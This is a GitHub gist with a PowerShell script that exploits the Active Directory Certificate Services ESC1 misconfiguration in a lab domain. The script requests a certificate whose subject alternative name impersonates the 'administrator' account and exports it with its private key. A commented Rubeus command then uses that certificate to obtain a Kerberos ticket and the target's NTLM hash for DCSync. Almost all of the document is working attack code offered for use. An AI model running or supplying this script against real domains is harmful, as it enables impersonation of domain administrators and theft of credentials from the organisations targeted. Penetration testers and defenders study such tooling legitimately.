Skip to content

Instantly share code, notes, and snippets.

@b4cktr4ck2
Created February 22, 2023 21:50
Show Gist options
  • Save b4cktr4ck2/95a9b908e57460d9958e8238f85ef8ee to your computer and use it in GitHub Desktop.
Save b4cktr4ck2/95a9b908e57460d9958e8238f85ef8ee to your computer and use it in GitHub Desktop.
PowerShell script to exploit ESC1/retrieve your own NTLM password hash.
#Thank you @NotMedic for troubleshooting/validating stuff!
$password = Read-Host -Prompt "Enter Password"
#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time!
$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now.
$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored?
$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box.
$CASERVER = "alexlab-dc01-ca" #CA name.
$CA = $CAFQDN + "\" + $CASERVER
$CERTFILE = "C:\Users\lowpriv\Desktop\cert.pfx" #FULL PATH TO WHERE YOU WANT PFX TO BE GENERATED.
$TEMPLATE = "Wifi" #Vulnerable template to target. USE COMMON NAME *NOT* FRIENDLY NAME!!!
$domain = "alexlab.local" #domain
$target = "administrator" #Account username you're trying to impersonate
write-host "Variables set. Continue to create .inf" -foregroundcolor green
write-host "Generating Certificate INF File..."
$certinf = @"
;---------------CertificateRequestTemplate.inf--------------
[NewRequest]
Subject="CN=$domain\$target"
Exportable=TRUE
KeySpec=1
KeyUsage=0xf0
[Extensions]
2.5.29.17 = "{text}" ; SAN - Subject Alternative Name
_continue_ = "upn=$target@$domain&"
[RequestAttributes]
CertificateTemplate=$TEMPLATE
"@
#Uncomment the below INF if you want to request a cert for yourself and get your own NTLM hash.
#$certinf = @"
#;---------------CertificateRequestTemplate.inf--------------
#[NewRequest]
#Subject="CN=$server"
#Exportable=TRUE
#KeySpec=1
#KeyUsage=0xf0
#[RequestAttributes]
#CertificateTemplate=$TEMPLATE
#"@
$certinf > "$CERTPATH$server.inf"
write-host ".inf created. Continue to create .req file" -foregroundcolor green
CertReq.exe -new "$CERTPATH$server.inf" "$CERTPATH$server.req"
write-host ".req created. Checking to see of files exist" -foregroundcolor green
$testinf = Test-Path "$CERTPATH$server.inf"
$testreq = Test-Path "$CERTPATH$server.req"
if ($testinf -eq $true){
write-host "$CERTPATH$server.inf successfully generated." -foregroundcolor green
}
else {
write-host "$CERTPATH$server.inf could not be found. Check for errors." -ForegroundColor Red
break
}
if ($testreq -eq $true){
write-host "$CERTPATH$server.req successfully generated." -foregroundcolor green
}
else {
write-host "$CERTPATH$server.req could not be found. Check for errors." -ForegroundColor Red
break
}
write-host "Submitting new Certificate for $server"
CertReq -Submit -config "$CA" "$CERTPATH$server.req" "$CERTPATH$server.cer"
write-host "Importing .cer"
certreq -accept "$CERTPATH$server.cer" -user
write-host "All OK. Continue" -foregroundcolor green
#Exporting certificate with Private Key
write-host "Exporting PFX with private key"
$Thumbprint = gci Cert:\CurrentUser\My | Select-Object -Property Thumbprint -Last 1
certutil -user -p $password -exportpfx My $Thumbprint.Thumbprint $CERTFILE "nochain"
#Cleaning
#pfft who cleans up after they're done
#Move-Item -Path "$CERTPATH*cer","$CERTPATH*inf","$CERTPATH*req" -Destination "C:\Users\lowpriv\Desktop\Cert"
#Rubeus.exe asktgt /getcredentials /password:"password_you_set" /user:user_you_impersonating /certificate:yourcert.pfx /domain:alexlab.local /dc:dc01 /show
#This will use PKINIT to build a TGT + retrieve NTLM hash of user you're targeting. Enjoy DCSYNC :)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment